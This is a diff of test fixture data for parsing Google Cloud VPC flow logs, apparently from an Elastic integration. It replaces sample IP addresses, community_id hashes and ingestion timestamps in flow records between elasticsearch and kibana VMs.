"{\"insertId\":\"1ulp77rfdvho4b\",\"jsonPayload\":{\"bytes_sent\":\"50379\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60112,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"130\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", "end": "2019-06-14T03:49:18.224268993Z", @@ -3575,18 +3575,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 200417, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 250 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:U8onVg/hApWe9WsWGFifAt6Xktg=", + "community_id": "1:VmSf9DDKsJGi5cMJABVFKp5r22M=", "bytes": 200417, "name": "default", "transport": "tcp", @@ -3608,7 +3608,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -3645,8 +3645,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868540500Z", - "original": "{\"insertId\":\"1ulp77rfdvho4m\",\"jsonPayload\":{\"bytes_sent\":\"200417\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"250\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391348500Z", + "original": "{\"insertId\":\"1ulp77rfdvho4m\",\"jsonPayload\":{\"bytes_sent\":\"200417\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"250\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", "end": "2019-06-14T03:49:55.213244028Z", @@ -3667,10 +3667,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33524, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -3684,7 +3684,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jUDducT3iKEBK6mG6FO1bbR/lzQ=", + "community_id": "1:6nRZDTz3kwMjD/sK6/2SvfZM7Ks=", "bytes": 30233, "name": "default", "transport": "tcp", @@ -3707,7 +3707,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -3743,8 +3743,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868543800Z", - "original": "{\"insertId\":\"1ulp77rfdvho5t\",\"jsonPayload\":{\"bytes_sent\":\"30233\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"37\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391353Z", + "original": "{\"insertId\":\"1ulp77rfdvho5t\",\"jsonPayload\":{\"bytes_sent\":\"30233\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"37\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", "end": "2019-06-14T03:49:56.461087350Z", @@ -3771,18 +3771,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 160693, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 237 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jiDRQHDBdyhzib4qfhhB5Y0obik=", + "community_id": "1:if1o1IHC+FQXkxdlwDLZoOhwlFs=", "bytes": 160693, "name": "default", "transport": "tcp", @@ -3804,7 +3804,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -3841,8 +3841,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868547100Z", - "original": "{\"insertId\":\"1ulp77rfdvho50\",\"jsonPayload\":{\"bytes_sent\":\"160693\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"237\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391357100Z", + "original": "{\"insertId\":\"1ulp77rfdvho50\",\"jsonPayload\":{\"bytes_sent\":\"160693\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"237\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", "end": "2019-06-14T03:49:59.565451051Z", @@ -3869,18 +3869,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33694, "bytes": 59903, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 353 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:vLK9hCfMg91TvjmTPfnw8bfG514=", + "community_id": "1:YFlTqXDJr36riIZMLbrmKhw38gg=", "bytes": 59903, "name": "default", "transport": "tcp", @@ -3902,7 +3902,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -3939,8 +3939,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868550400Z", - "original": "{\"insertId\":\"1ulp77rfdvho63\",\"jsonPayload\":{\"bytes_sent\":\"59903\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391360500Z", + "original": "{\"insertId\":\"1ulp77rfdvho63\",\"jsonPayload\":{\"bytes_sent\":\"59903\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", "end": "2019-06-14T03:49:59.565117754Z", @@ -3961,9 +3961,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33924, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -3977,7 +3977,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ji6ZJhSkwxeKiorTmyrgBE0/o+c=", + "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -3992,7 +3992,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -4016,8 +4016,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868553600Z", - "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391364700Z", + "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:20.634545217Z", "end": "2019-06-14T03:46:20.745658276Z", @@ -4040,9 +4040,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65271, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -4056,7 +4056,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:32epFp/pi9XGVYf8FMJ7jpc0AzI=", + "community_id": "1:qv0hIE4qzHUK+++IYF3H4yaOdYA=", "bytes": 129335, "transport": "tcp", "type": "ipv4", @@ -4071,7 +4071,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -4095,8 +4095,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868556900Z", - "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391369300Z", + "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378070Z", "end": "2019-06-14T03:49:55.318940798Z", @@ -4123,17 +4123,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 33862, "bytes": 1464, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:PNZTJG/Xqm+YMqKIui8nRXoLovE=", + "community_id": "1:HWHsV+dz7l0NO6OLlewyD4wOVhc=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -4147,7 +4147,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -4172,8 +4172,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868560300Z", - "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391374100Z", + "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:11.655143526Z", "end": "2019-06-14T03:46:11.779780615Z", @@ -4202,17 +4202,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65321, "bytes": 75477, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 737 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bN6NKWS7CM7qV5T0FRSxEVoL53I=", + "community_id": "1:CLTnKCsx3XAJV3yhtJSs+Vn6Xsc=", "bytes": 75477, "transport": "tcp", "type": "ipv4", @@ -4226,7 +4226,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -4251,8 +4251,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868563500Z", - "original": "{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391379600Z", + "original": 